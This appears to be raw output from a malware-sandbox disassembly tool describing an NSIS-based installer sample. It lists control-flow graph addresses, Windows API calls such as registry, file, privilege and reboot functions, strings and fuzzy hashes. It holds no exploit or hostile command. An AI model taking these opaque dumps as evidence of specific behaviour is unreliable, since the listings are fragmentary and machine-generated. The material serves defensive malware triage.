4272->4273 4274 404dfe lstrlenW wsprintfW SetDlgItemTextW 4273->4274 4274->4263 4275 402621 4276 402dab 21 API calls 4275->4276 4277 402628 4276->4277 4280 406024 GetFileAttributesW CreateFileW 4277->4280 4279 402634 4280->4279 4281 404623 lstrlenW 4282 404642 4281->4282 4283 404644 WideCharToMultiByte 4281->4283 4282->4283 4284 4025a3 4294 402deb 4284->4294 4287 402d89 21 API calls 4288 4025b6 4287->4288 4289 4025d2 RegEnumKeyW 4288->4289 4290 4025de RegEnumValueW 4288->4290 4292 402933 4288->4292 4291 4025f3 RegCloseKey 4289->4291 4290->4291 4291->4292 4295 402dab 21 API calls 4294->4295 4296 402e02 4295->4296 4297 4063a1 RegOpenKeyExW 4296->4297 4298 4025ad 4297->4298 4298->4287 4299 4049a4 4300 4049d0 4299->4300 4301 4049e1 4299->4301 4360 405b78 GetDlgItemTextW 4300->4360 4302 4049ed GetDlgItem 4301->4302 4309 404a4c 4301->4309 4304 404a01 4302->4304 4308 404a15 SetWindowTextW 4304->4308 4313 405eae 4 API calls 4304->4313 4305 404b30 4310 404cdf 4305->4310 4362 405b78 GetDlgItemTextW 4305->4362 4306 4049db 4307 4067e2 5 API calls 4306->4307 4307->4301 4314 4044b3 22 API calls 4308->4314 4309->4305 4309->4310 4315 406571 21 API calls 4309->4315 4312 40451a 8 API calls 4310->4312 4317 404cf3 4312->4317 4318 404a0b 4313->4318 4319 404a31 4314->4319 4320 404ac0 SHBrowseForFolderW 4315->4320 4316 404b60 4321 405f0b 18 API calls 4316->4321 4318->4308 4325 405e03 3 API calls 4318->4325 4322 4044b3 22 API calls 4319->4322 4320->4305 4323 404ad8 CoTaskMemFree 4320->4323 4324 404b66 4321->4324 4326 404a3f 4322->4326 4327 405e03 3 API calls 4323->4327 4363 406534 lstrcpynW 4324->4363 4325->4308 4361 4044e8 SendMessageW 4326->4361 4330 404ae5 4327->4330 4332 404b1c SetDlgItemTextW 4330->4332 4336 406571 21 API calls 4330->4336 4331 404a45 4334 406928 5 API calls 4331->4334 4332->4305 4333 404b7d 4335 406928 5 API calls 4333->4335 4334->4309 4343 404b84 4335->4343 4337 404b04 lstrcmpiW 4336->4337 4337->4332 4339 404b15 lstrcatW 4337->4339 4338 404bc5 4364 406534 lstrcpynW 
4338->4364 4339->4332 4341 404bcc 4342 405eae 4 API calls 4341->4342 4344 404bd2 GetDiskFreeSpaceW 4342->4344 4343->4338 4347 405e4f 2 API calls 4343->4347 4348 404c1d 4343->4348 4346 404bf6 MulDiv 4344->4346 4344->4348 4346->4348 4347->4343 4349 404c8e 4348->4349 4350 404e29 24 API calls 4348->4350 4351 404cb1 4349->4351 4353 40140b 2 API calls 4349->4353 4352 404c7b 4350->4352 4365 4044d5 EnableWindow 4351->4365 4354 404c90 SetDlgItemTextW 4352->4354 4355 404c80 4352->4355 4353->4351 4354->4349 4357 404d60 24 API calls 4355->4357 4357->4349 4358 404ccd 4358->4310 4359 4048fd SendMessageW 4358->4359 4359->4310 4360->4306 4361->4331 4362->4316 4363->4333 4364->4341 4365->4358 4366 4015a8 4367 402dab 21 API calls 4366->4367 4368 4015af SetFileAttributesW 4367->4368 4369 4015c1 4368->4369 4370 401fa9 4371 402dab 21 API calls 4370->4371 4372 401faf 4371->4372 4373 4055b9 28 API calls 4372->4373 4374 401fb9 4373->4374 4375 405b17 2 API calls 4374->4375 4376 401fbf 4375->4376 4377 401fe2 CloseHandle 4376->4377 4379 4069d3 5 API calls 4376->4379 4381 402933 4376->4381 4377->4381 4380 401fd4 4379->4380 4380->4377 4383 40647b wsprintfW 4380->4383 4383->4377 3376 403b2c 3377 403b44 3376->3377 3378 403b36 CloseHandle 3376->3378 3383 403b71 3377->3383 3378->3377 3381 405c40 71 API calls 3382 403b55 3381->3382 3384 403b7f 3383->3384 3385 403b49 3384->3385 3386 403b84 FreeLibrary GlobalFree 3384->3386 3385->3381 3386->3385 3386->3386 4384 40552d 4385 405551 4384->4385 4386 40553d 4384->4386 4387 405559 IsWindowVisible 4385->4387 4390 405570 4385->4390 4388 405543 4386->4388 4396 40559a 4386->4396 4389 405566 4387->4389 4387->4396 4392 4044ff SendMessageW 4388->4392 4393 404e6e 5 API calls 4389->4393 4391 40559f CallWindowProcW 4390->4391 4395 404eee 4 API calls 4390->4395 4394 40554d 4391->4394 4392->4394 4393->4390 4395->4396 4396->4391 4397 40202f 4398 402dab 21 API calls 4397->4398 4399 402036 4398->4399 4400 406928 5 API calls 4399->4400 4401 402045 4400->4401 4402 402061 
GlobalAlloc 4401->4402 4403 4020d1 4401->4403 4402->4403 4404 402075 4402->4404 4405 406928 5 API calls 4404->4405 4406 40207c 4405->4406 4407 406928 5 API calls 4406->4407 4408 402086 4407->4408 4408->4403 4412 40647b wsprintfW 4408->4412 4410 4020bf 4413 40647b wsprintfW 4410->4413 4412->4410 4413->4403 4414 40252f 4415 402deb 21 API calls 4414->4415 4416 402539 4415->4416 4417 402dab 21 API calls 4416->4417 4418 402542 4417->4418 4419 40254d RegQueryValueExW 4418->4419 4423 402933 4418->4423 4420 402573 RegCloseKey 4419->4420 4421 40256d 4419->4421 4420->4423 4421->4420 4425 40647b wsprintfW 4421->4425 4425->4420 4426 4021af 4427 402dab 21 API calls 4426->4427 4428 4021b6 4427->4428 4429 402dab 21 API calls 4428->4429 4430 4021c0 4429->4430 4431 402dab 21 API calls 4430->4431 4432 4021ca 4431->4432 4433 402dab 21 API calls 4432->4433 4434 4021d4 4433->4434 4435 402dab 21 API calls 4434->4435 4436 4021de 4435->4436 4437 40221d CoCreateInstance 4436->4437 4438 402dab 21 API calls 4436->4438 4441 40223c 4437->4441 4438->4437 4439 401423 28 API calls 4440 4022fb 4439->4440 4441->4439 4441->4440 4442 403fb4 4443 403fcc 4442->4443 4444 40412d 4442->4444 4443->4444 4445 403fd8 4443->4445 4446 40413e GetDlgItem GetDlgItem 4444->4446 4451 40417e 4444->4451 4448 403fe3 SetWindowPos 4445->4448 4449 403ff6 4445->4449 4450 4044b3 22 API calls 4446->4450 4447 4041d8 4452 4044ff SendMessageW 4447->4452 4460 404128 4447->4460 4448->4449 4453 404041 4449->4453 4454 403fff ShowWindow 4449->4454 4455 404168 SetClassLongW 4450->4455 4451->4447 4459 401389 2 API calls 4451->4459 4482 4041ea 4452->4482 4456 404060 4453->4456 4457 404049 DestroyWindow 4453->4457 4461 4040eb 4454->4461 4462 40401f GetWindowLongW 4454->4462 4458 40140b 2 API calls 4455->4458 4464 404065 SetWindowLongW 4456->4464 4465 404076 4456->4465 4463 40443c 4457->4463 4458->4451 4466 4041b0 4459->4466 4467 40451a 8 API calls 4461->4467 4462->4461 4468 404038 ShowWindow 4462->4468 4463->4460 4475 40446d ShowWindow 
4463->4475 4464->4460 4465->4461 4469 404082 GetDlgItem 4465->4469 4466->4447 4470 4041b4 SendMessageW 4466->4470 4467->4460 4468->4453 4473 4040b0 4469->4473 4474 404093 SendMessageW IsWindowEnabled 4469->4474 4470->4460 4471 40140b 2 API calls 4471->4482 4472 40443e DestroyWindow EndDialog 4472->4463 4477 4040bd 4473->4477 4480 404104 SendMessageW 4473->4480 4481 4040d0 4473->4481 4487 4040b5 4473->4487 4474->4460 4474->4473 4475->4460 4476 406571 21 API calls 4476->4482 4477->4480 4477->4487 4478 40448c SendMessageW 4478->4461 4479 4044b3 22 API calls 4479->4482 4480->4461 4483 4040d8 4481->4483 4484 4040ed 4481->4484 4482->4460 4482->4471 4482->4472 4482->4476 4482->4479 4488 4044b3 22 API calls 4482->4488 4504 40437e DestroyWindow 4482->4504 4486 40140b 2 API calls 4483->4486 4485 40140b 2 API calls 4484->4485 4485->4487 4486->4487 4487->4461 4487->4478 4489 404265 GetDlgItem 4488->4489 4490 404282 ShowWindow EnableWindow 4489->4490 4491 40427a 4489->4491 4513 4044d5 EnableWindow 4490->4513 4491->4490 4493 4042ac EnableWindow 4498 4042c0 4493->4498 4494 4042c5 GetSystemMenu EnableMenuItem SendMessageW 4495 4042f5 SendMessageW 4494->4495 4494->4498 4495->4498 4497 403f95 22 API calls 4497->4498 4498->4494 4498->4497 4514 4044e8 SendMessageW 4498->4514 4515 406534 lstrcpynW 4498->4515 4500 404324 lstrlenW 4501 406571 21 API calls 4500->4501 4502 40433a SetWindowTextW 4501->4502 4503 401389 2 API calls 4502->4503 4503->4482 4504->4463 4505 404398 CreateDialogParamW 4504->4505 4505->4463 4506 4043cb 4505->4506 4507 4044b3 22 API calls 4506->4507 4508 4043d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4507->4508 4509 401389 2 API calls 4508->4509 4510 40441c 4509->4510 4510->4460 4511 404424 ShowWindow 4510->4511 4512 4044ff SendMessageW 4511->4512 4512->4463 4513->4493 4514->4498 4515->4500 4516 401a35 4517 402dab 21 API calls 4516->4517 4518 401a3e ExpandEnvironmentStringsW 4517->4518 4519 401a52 4518->4519 4521 401a65 4518->4521 4520 401a57 lstrcmpW 
4519->4520 4519->4521 4520->4521 4527 4023b7 4528 4023c5 4527->4528 4529 4023bf 4527->4529 4531 402dab 21 API calls 4528->4531 4533 4023d3 4528->4533 4530 402dab 21 API calls 4529->4530 4530->4528 4531->4533 4532 4023e1 4535 402dab 21 API calls 4532->4535 4533->4532 4534 402dab 21 API calls 4533->4534 4534->4532 4536 4023ea WritePrivateProfileStringW 4535->4536 4537 4014b8 4538 4014be 4537->4538 4539 401389 2 API calls 4538->4539 4540 4014c6 4539->4540 4541 402439 4542 402441 4541->4542 4543 40246c 4541->4543 4544 402deb 21 API calls 4542->4544 4545 402dab 21 API calls 4543->4545 4547 402448 4544->4547 4546 402473 4545->4546 4552 402e69 4546->4552 4549 402480 4547->4549 4550 402dab 21 API calls 4547->4550 4551 402459 RegDeleteValueW RegCloseKey 4550->4551 4551->4549 4553 402e76 4552->4553 4554 402e7d 4552->4554 4553->4549 4554->4553 4556 402eae 4554->4556 4557 4063a1 RegOpenKeyExW 4556->4557 4558 402edc 4557->4558 4559 402eec RegEnumValueW 4558->4559 4566 402f0f 4558->4566 4567 402f86 4558->4567 4560 402f76 RegCloseKey 4559->4560 4559->4566 4560->4567 4561 402f4b RegEnumKeyW 4562 402f54 RegCloseKey 4561->4562 4561->4566 4563 406928 5 API calls 4562->4563 4565 402f64 4563->4565 4564 402eae 6 API calls 4564->4566 4565->4567 4568 402f68 RegDeleteKeyW 4565->4568 4566->4560 4566->4561 4566->4562 4566->4564 4567->4553 4568->4567 4569 40173a 4570 402dab 21 API calls 4569->4570 4571 401741 SearchPathW 4570->4571 4572 40175c 4571->4572 4573 401d3d 4574 402d89 21 API calls 4573->4574 4575 401d44 4574->4575 4576 402d89 21 API calls 4575->4576 4577 401d50 GetDlgItem 4576->4577 4578 40263d 4577->4578

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE ref: 00403532
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040355D
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403570
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403609
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403646
• OleInitialize.OLE32(00000000), ref: 0040364D
• SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040366C
• GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403681
• CharNextW.USER32(00000000,007B3000,00000020,007B3000,00000000,?,00000008,0000000A,0000000C), ref: 004036BA
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F2
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403803
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040380F
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040382B
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040383C
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403844
• DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403858
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B3000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403931
  • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
• wsprintfW.USER32 ref: 0040398E
• GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039C1
• DeleteFileW.KERNEL32(007AB800), ref: 004039CD
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039FB
  • Part of subcall function 004062F4: MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Ms63nDrOBa.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A11
  • Part of subcall function 00405B17: CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B40
  • Part of subcall function 00405B17: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B4D
  • Part of subcall function 00406891: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
  • Part of subcall function 00406891: FindClose.KERNEL32(00000000), ref: 004068A8
• ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5A
• OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5F
• ExitProcess.KERNEL32 ref: 00403A7C
• CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403A83
• GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A9F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AA6
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ABB
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ADE
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403B03
• ExitProcess.KERNEL32 ref: 00403B26
  • Part of subcall function 00405AE2: CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
Similarity
• API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
• String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse5B61.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\Ms63nDrOBa.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
• API String ID: 2017177436-724603151
• Opcode ID: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
• Instruction ID: 67d79b026de4563afcf96275ffa6c79ee12181f10d5245d5b23545884d7a86e1
• Opcode Fuzzy Hash: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
• Instruction Fuzzy Hash: FCF1F570604301ABD720AF659D05B6B7EE8EF81B06F10443EF581B62D1DB7D8A45CB6E

Control-flow Graph

control_flow_graph: function with entry block 405c40-405c66 (DeleteFileW, FindFirstFileW/FindNextFileW loop); the rendered graph's node and edge list is omitted here, the APIs it calls are listed below
APIs
• DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405C69
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,\*.*), ref: 00405CB1
• lstrcatW.KERNEL32(?,0040A014), ref: 00405CD4
• lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,?,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CDA
• FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,?,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CEA
• FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D8A
• FindClose.KERNEL32(00000000), ref: 00405D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*$\*.*
• API String ID: 2035342205-2642911601
• Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
• Instruction ID: 81bbe464494fb05f5b6ac6ef540245f59b5aaf372d852028a7707812675e6212
• Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
• Instruction Fuzzy Hash: 7C419230805A14B6DB216B658D4DBBF7678EF81714F10813FF841B11D1DB7C4A829E6E
APIs
• FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
• FindClose.KERNEL32(00000000), ref: 004068A8
Memory Dump Source
• Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
• Instruction ID: e6b866c1dacf5e46d4e55f169e1c72a585861dd5ed209923aafe0abde5973ea2
• Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
• Instruction Fuzzy Hash: 9BD012325161205BD29127386D0C85B7A9CAF563317129B36F46AF22E0C7748C628698

Control-flow Graph

control_flow_graph: function with entry block 403c06-403c1e (GetUserDefaultUILanguage, RegisterClassW, CreateWindowExW, DialogBoxParamW); the rendered graph's node and edge list is omitted here, the APIs it calls are listed below
APIs
  • Part of subcall function 00406928: GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
  • Part of subcall function 00406928: GetProcAddress.KERNEL32(00000000,?), ref: 00406955
• GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403C20
  • Part of subcall function 0040647B: wsprintfW.USER32 ref: 00406488
• lstrcatW.KERNEL32(1033,007A1748), ref: 00403C87
• lstrlenW.KERNEL32(007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,76233420), ref: 00403D07
• lstrcmpiW.KERNEL32(007A61F8,.exe,007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D1A
• GetFileAttributesW.KERNEL32(007A6200), ref: 00403D25
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D6E
• RegisterClassW.USER32(007A7200), ref: 00403DAB
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC3
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DF8
• ShowWindow.USER32(00000005,00000000), ref: 00403E2E
• GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E5A
• GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E67
• RegisterClassW.USER32(007A7200), ref: 00403E70
• DialogBoxParamW.USER32(?,00000000,00403FB4,00000000), ref: 00403E8F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 606308-2896555866
• Opcode ID: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
• Instruction ID: e3f36f251999893233d50a16806d3669fe4950a37a4839b1d492828efc6e8aed
• Opcode Fuzzy Hash: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
• Instruction Fuzzy Hash: 3061C470100600AAE720AF66DD45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

Control-flow Graph

control_flow_graph: function with entry block 403082-4030d0 (GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc); the rendered graph's node and edge list is omitted here, the APIs it calls are listed below
APIs
• GetTickCount.KERNEL32 ref: 00403093
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ms63nDrOBa.exe,00000400), ref: 004030AF
  • Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00406028
  • Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
• GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ms63nDrOBa.exe,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 004030FB
• GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
Strings
Memory Dump Source
• Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ms63nDrOBa.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-184383526
• Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
• Instruction ID: 635ab88c792e9e5f97a92d6c795dead4e0d31dcfeb410e4bc66b7a0500b41a5f
• Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
• Instruction Fuzzy Hash: DB51D371A01204AFDB109F65DD41BAE7EACEB49716F20817BF900B62D1CA7C9F408B5D

                                                  Control-flow Graph (graph image not captured; function entry block 401774)
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
